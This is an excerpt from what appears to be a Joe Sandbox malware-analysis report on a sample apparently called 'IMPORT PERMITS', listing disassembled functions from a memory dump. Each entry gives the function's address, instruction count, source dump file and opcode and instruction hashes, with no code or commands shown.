                                                                                                                                • Instruction ID: 46d8dd52cc21ded4fae9e6a518800dc8a8210dee0bdc72346248f43be27ed53a
                                                                                                                                • Opcode Fuzzy Hash: 97d69e2bcd62f13b1c51d90752b23aa8e98aac6a749d9505314a60644aefdfc4
                                                                                                                                • Instruction Fuzzy Hash: C951CE719007069BD721EF5AC880A6FFBF9BF64710F50462FD292976B1D7B0A541CB50
                                                                                                                                Function 0141E443 Relevance: .2, Instructions: 158COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c2a09bf6f2b10f11ec69dd4cd56f1283685764c006dc5f1b85425465e3b4917f
                                                                                                                                • Instruction ID: 21be0169e7be0d7039479e593730ff2b46b74a2329925015426c766644b5b3da
                                                                                                                                • Opcode Fuzzy Hash: c2a09bf6f2b10f11ec69dd4cd56f1283685764c006dc5f1b85425465e3b4917f
                                                                                                                                • Instruction Fuzzy Hash: E3516A71240A16DFDB22EFA9C980F6AB3F9FF14784F41042EEA4297261D734E941CB50
                                                                                                                                Function 01484180 Relevance: .2, Instructions: 156COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a9812ad2eac5667ee823411280f0986f95117339160bfe91213ade0e7f72a7ad
                                                                                                                                • Instruction ID: d7b2f6480e0bc6310c483177ba16615901bd49e29d692013530c4cdb5ded2998
                                                                                                                                • Opcode Fuzzy Hash: a9812ad2eac5667ee823411280f0986f95117339160bfe91213ade0e7f72a7ad
                                                                                                                                • Instruction Fuzzy Hash: 705159716083429FD754EF6AD880A6FBBE5BFD8604F48492EF589C7260E730D905CB52
                                                                                                                                Function 014045B1 Relevance: .2, Instructions: 156COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                                                • Instruction ID: af30a45fb0cf5054b0151aa92c9abae630a08d946ea21e14c8030bcdc4ca7cb5
                                                                                                                                • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                                                • Instruction Fuzzy Hash: 80518071D0021AABDF16DF99C440BEEBBB9EF45354F08406AEA05AB3A0D774D945CB90
                                                                                                                                Function 0146E9E0 Relevance: .2, Instructions: 154COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                                                                • Instruction ID: 400a21e439247139f15b9e20c8cc72ebbd1a85d55a8df9f5bd7d22e39960a4e1
                                                                                                                                • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                                                                • Instruction Fuzzy Hash: 7151C535D0021AEFEF11DE94C884BAFBBFDAB00718F15422AD611772A0D7309E458BA2
                                                                                                                                Function 014A8B28 Relevance: .2, Instructions: 152COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: caa051cdade1f22edc589594094e4ef774e4443e4d5a69dc73c77e953d87f9e2
                                                                                                                                • Instruction ID: b3eff04c7946a57bae3ab0da712dfdc50fe5826093608c9aa3eccbda84791e0b
                                                                                                                                • Opcode Fuzzy Hash: caa051cdade1f22edc589594094e4ef774e4443e4d5a69dc73c77e953d87f9e2
                                                                                                                                • Instruction Fuzzy Hash: 3E41D5707016029BEB29DB2DC894B7BBB9AEFB4621F86811BF915873A1D730D801C691
                                                                                                                                Function 0146CBF0 Relevance: .1, Instructions: 148COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 380fbf571a78ac69c9c2d1f9b2db742d0813c8c7391abc79ce3699809ad913a6
                                                                                                                                • Instruction ID: 01a59d7f371998c29ab32e1836c966a4066aa9c65ebafb25135437f4464e44e6
                                                                                                                                • Opcode Fuzzy Hash: 380fbf571a78ac69c9c2d1f9b2db742d0813c8c7391abc79ce3699809ad913a6
                                                                                                                                • Instruction Fuzzy Hash: 43518B75A01216DFCB20DFA9C9C09AFBBB9FB58318B11451AE589A3314D734ED02CBD1
                                                                                                                                Function 014AA9D3 Relevance: .1, Instructions: 139COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                                                • Instruction ID: 2dcdddcd3aa3e174234fd8904ee5ea5094aec87eb90fe8708ab94f47a106ae4f
                                                                                                                                • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                                                • Instruction Fuzzy Hash: 9F4116316007029FCB25CF28C994A6BB7E9FFA0214B56462FEA1287750EB30EC08C790
                                                                                                                                Function 014101F8 Relevance: .1, Instructions: 138COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 4c3f148cec16a480aee4c3e9957bed4e0d047dee5f36f6d8c42dba6eba655c28
                                                                                                                                • Instruction ID: 6c7f0b8a4ce5349b956cc4ed0414d04480e2a533002d6ac2959fc0ad88670269
                                                                                                                                • Opcode Fuzzy Hash: 4c3f148cec16a480aee4c3e9957bed4e0d047dee5f36f6d8c42dba6eba655c28
                                                                                                                                • Instruction Fuzzy Hash: 6741BA36A00219DBDB10DF98C480AEEBBB4BF58710F14812BF915EB364D7349D82CBA4
                                                                                                                                Function 0140EBFC Relevance: .1, Instructions: 138COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: f18356418ea1fed91a2832b5c1732725e1d4e69095bf9ec42cd5e47f48dcfa3d
                                                                                                                                • Instruction ID: 1113db147154eb18dc90672f8cc4c832630602a7a673db7151054d968529bb04
                                                                                                                                • Opcode Fuzzy Hash: f18356418ea1fed91a2832b5c1732725e1d4e69095bf9ec42cd5e47f48dcfa3d
                                                                                                                                • Instruction Fuzzy Hash: A741B2712083029FD725DF29C884A17B7E5FF94218F00483EEA97D3761DB35E4598B50
                                                                                                                                Function 01422750 Relevance: .1, Instructions: 137COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                                                • Instruction ID: c5cb4522359708e7f6d896ae8c1236fd37ac030b069cf97432c6ceb593e8946f
                                                                                                                                • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                                                • Instruction Fuzzy Hash: 0B515F75A00115DFCB55CF98C480AAEFBB2FF85714F2482AAD915A7362D770AE41CB90
                                                                                                                                Function 013E6154 Relevance: .1, Instructions: 133COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ff7e564ed7180b6faa33194eb9b2a4b203dca4c2d1ff8a0567f3557b32921aee
                                                                                                                                • Instruction ID: c866583c9397ab15989fe0fe9b3ad0897c9083d3f72079a07e423c24f97b06f4
                                                                                                                                • Opcode Fuzzy Hash: ff7e564ed7180b6faa33194eb9b2a4b203dca4c2d1ff8a0567f3557b32921aee
                                                                                                                                • Instruction Fuzzy Hash: EC51E9B0901216DBEF258B6CCC05BE9BBF5EF21318F1442AAE529976E1D7349981CF40
                                                                                                                                Function 013E0BCD Relevance: .1, Instructions: 130COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 9cd8feb02fd3ee3f144e1ac2f86ca1b805633729d2e84f4ac1face970b26819e
                                                                                                                                • Instruction ID: 160dc1039ad81024d95f9206156e2401b12b0fb41e6dc092519606d666b6e745
                                                                                                                                • Opcode Fuzzy Hash: 9cd8feb02fd3ee3f144e1ac2f86ca1b805633729d2e84f4ac1face970b26819e
                                                                                                                                • Instruction Fuzzy Hash: 1241B331A00329DACF21DF2DC944BEA77B8EF98700F0100AAE908AB291D774DE81CF51
                                                                                                                                Function 014A866E Relevance: .1, Instructions: 129COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                                • Instruction ID: 640bd1059a1907d72d9a76b94940a3a4db70b5844a68ee76db195ae96757dfb0
                                                                                                                                • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                                • Instruction Fuzzy Hash: 4E41C675B00107ABEB15DF99CC84ABFBFBAEFA4201F96406AE50497361DA70DD11C760
                                                                                                                                Function 013E0887 Relevance: .1, Instructions: 128COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 086a284f9c7280e56e0c328876b486ed0e866ed6b1526395c4cea0471cfcf205
                                                                                                                                • Instruction ID: 85300659b8901c94c43f93d26dc25ed7f2b4d01dc78303365f4dcd048048435b
                                                                                                                                • Opcode Fuzzy Hash: 086a284f9c7280e56e0c328876b486ed0e866ed6b1526395c4cea0471cfcf205
                                                                                                                                • Instruction Fuzzy Hash: 0241D371700716DFE729CF28C484A26BBF8FF48318B104A6EF55A87AA0E770E845CB50
                                                                                                                                Function 0140A470 Relevance: .1, Instructions: 127COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: cc5c1f6d224eac929194d0b15d9d11cd2c7a861239aab2af616b440f954ec8f0
                                                                                                                                • Instruction ID: 7e8959ed7cb95775480f3aa47727b5bef101315df04c8f4d959de8fd066668cf
                                                                                                                                • Opcode Fuzzy Hash: cc5c1f6d224eac929194d0b15d9d11cd2c7a861239aab2af616b440f954ec8f0
                                                                                                                                • Instruction Fuzzy Hash: BD419E32941205CFDF22DF69D4A4BAE7BB0FB14214F2901AAD415BB2F1DB359941CBA4
                                                                                                                                Function 013E8BF0 Relevance: .1, Instructions: 124COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 44f3b568fbd3b7ddb3e96bd4ec6648a1572ffdcd8426501ea31ca6580ad03fe3
                                                                                                                                • Instruction ID: 9e70eae53385f959f0538b9d510fcac11d833f1657f34778d8e5d741146949f0
                                                                                                                                • Opcode Fuzzy Hash: 44f3b568fbd3b7ddb3e96bd4ec6648a1572ffdcd8426501ea31ca6580ad03fe3
                                                                                                                                • Instruction Fuzzy Hash: 2041F531D01316CBDF248F58D888A5ABBF5FB95708F1480AED5019BAB5C375D841CF90
                                                                                                                                Function 013D8918 Relevance: .1, Instructions: 123COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 22777f0a5a3f2a7bc3e0774fec25239832c38147151bbaa315f44864bbcb99cc
                                                                                                                                • Instruction ID: 827547c34fb1fc2e890bad2d80ca52d64eba8b7ade33182a52d1bd3e3019391e
                                                                                                                                • Opcode Fuzzy Hash: 22777f0a5a3f2a7bc3e0774fec25239832c38147151bbaa315f44864bbcb99cc
                                                                                                                                • Instruction Fuzzy Hash: 70414D325087069ED312DF699840B6BB6E9FF88B58F41092FF984D7260E730DE048B93
                                                                                                                                Function 013DA020 Relevance: .1, Instructions: 122COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                                                • Instruction ID: 65fe304203a5aecdddb7ae715e686751ce79d0b141323133037e4d019e925af5
                                                                                                                                • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                                                • Instruction Fuzzy Hash: 2A414832A00215DBDB21DE6D95607BBBB71EBD875CF15806BE945CB390D6328D80CB90
                                                                                                                                Function 013E09AD Relevance: .1, Instructions: 122COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 561148e2c76fe2e56c14acc7d6fa26d9451082a1ce7e3314c1ab6b809dbb4573
                                                                                                                                • Instruction ID: 580b3e2876d3bb4a5018a0ef1734deb3eb0f4856df1f394a1f3a0019ce0c9fac
                                                                                                                                • Opcode Fuzzy Hash: 561148e2c76fe2e56c14acc7d6fa26d9451082a1ce7e3314c1ab6b809dbb4573
                                                                                                                                • Instruction Fuzzy Hash: 45417971600715EFE725CF18C844B26BBF4FF58318F248A2AE5499B291E7B0E942CB90
                                                                                                                                Function 01410710 Relevance: .1, Instructions: 121COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                                                • Instruction ID: 6ad1afdc97e359dd75415588e7afa106679ad3f5bedac9131aafc6c6cc7f4a99
                                                                                                                                • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                                                • Instruction Fuzzy Hash: F2412C71A04705EFDB24CF99C980AAABBF4FF18700B10496EE566D7665D330EA85CF50
                                                                                                                                Function 013E262C Relevance: .1, Instructions: 119COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 615df56ced2cd58bc559b632a32ac63e213515104b3365bc48dbfc4f97b24498
                                                                                                                                • Instruction ID: a67794ee3aa75d0e00ea6bc0f80c4d043bb854f59e4eac088f1e0e8d8b3bb8e7
                                                                                                                                • Opcode Fuzzy Hash: 615df56ced2cd58bc559b632a32ac63e213515104b3365bc48dbfc4f97b24498
                                                                                                                                • Instruction Fuzzy Hash: AF4103B1941725CFCB21EF28C845A5AB7F9FF98328F11826EC4069B2E1DB709941CF51
                                                                                                                                Function 0141C8F9 Relevance: .1, Instructions: 116COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d682f2e11020becb4fe6512a8092e04623ab9bf0f49b3b36378ed565528c6a3f
                                                                                                                                • Instruction ID: 5552d05fee6ec834a6a80b25c3f5d2e3586cf613c3d022dd0654623416e2b0ef
                                                                                                                                • Opcode Fuzzy Hash: d682f2e11020becb4fe6512a8092e04623ab9bf0f49b3b36378ed565528c6a3f
                                                                                                                                • Instruction Fuzzy Hash: DA3179B2A40246DFDB52CF69C480799BBF1EB09724F2085AFD519EB361D7329902CF90
                                                                                                                                Function 014607C3 Relevance: .1, Instructions: 114COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 32dfe0a70cb092eb22520fb18a09c0ef1453d0ae554f577cbf1c3e3bbe6bda49
                                                                                                                                • Instruction ID: 0e67699087d3959e19c48d41ecc0aec161b2a1aa24bf2cb397df9638dc5b1888
                                                                                                                                • Opcode Fuzzy Hash: 32dfe0a70cb092eb22520fb18a09c0ef1453d0ae554f577cbf1c3e3bbe6bda49
                                                                                                                                • Instruction Fuzzy Hash: E2419F725043019FD720DF29C844B9BBBE8FF98654F004A2EF598C7261DB70D945CB92
                                                                                                                                Function 013D80A0 Relevance: .1, Instructions: 111COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 67e55c104e068e5c7f0d1b7f79e55272046401a2a1508a897d33d58712dd90c7
                                                                                                                                • Instruction ID: 9c28d1cdb0259bd6d8869189d8dda111f2c54470fd5a090806e1bac605925682
                                                                                                                                • Opcode Fuzzy Hash: 67e55c104e068e5c7f0d1b7f79e55272046401a2a1508a897d33d58712dd90c7
                                                                                                                                • Instruction Fuzzy Hash: B4410372E0561AEFCB01DF2CD840AA9B7B5FF44768F2082A9D815A7690D734FD458BD0
                                                                                                                                Function 014605A7 Relevance: .1, Instructions: 111COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c9e6a00e52cf77c963c3e856e54bb5b071c965ab1f82b78a1b24479d8fe38344
                                                                                                                                • Instruction ID: f13a4b737c250b6147c6d6b9fb72e36006cb92bf2b337e9c181ca0e214a7df62
                                                                                                                                • Opcode Fuzzy Hash: c9e6a00e52cf77c963c3e856e54bb5b071c965ab1f82b78a1b24479d8fe38344
                                                                                                                                • Instruction Fuzzy Hash: 9E41BF726046429BC320DF6DD840A6BB7A9FFD8704F14062EF998976A0E730ED14C7A6
                                                                                                                                Function 013E4859 Relevance: .1, Instructions: 111COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 8847ff43fd01c20b31e54ae2b94d95cf29e21b6569f2e9db9acf2a0b610675eb
                                                                                                                                • Instruction ID: 4f564bff962ecae1bc7f9c61750b7fbf2b476cced430f8d02968333f95904dd0
                                                                                                                                • Opcode Fuzzy Hash: 8847ff43fd01c20b31e54ae2b94d95cf29e21b6569f2e9db9acf2a0b610675eb
                                                                                                                                • Instruction Fuzzy Hash: 9941D3306003268BDB25DF2CD898B2ABBE9EF88358F15446DF645DB2E1DB34D801CB51
                                                                                                                                Function 013D8B50 Relevance: .1, Instructions: 111COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c75abaf2e3e1d39f3ca929f2377e78cb6cc79e264fc3e6a8837a6144e85c5112
                                                                                                                                • Instruction ID: c7cb69df9fa65d7f0d25292c462d668e2addf5c7e8a316c493a134e625499847
                                                                                                                                • Opcode Fuzzy Hash: c75abaf2e3e1d39f3ca929f2377e78cb6cc79e264fc3e6a8837a6144e85c5112
                                                                                                                                • Instruction Fuzzy Hash: 43418072A01609CFCF15CF6DD98099DF7F1FF88328B1086AED466A72A0D734A941CB40
                                                                                                                                Function 013F02E1 Relevance: .1, Instructions: 106COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                                                • Instruction ID: 206a431b85d0cff34aa54b01671adefc3155f73d6c351937ff2088071c60c012
                                                                                                                                • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
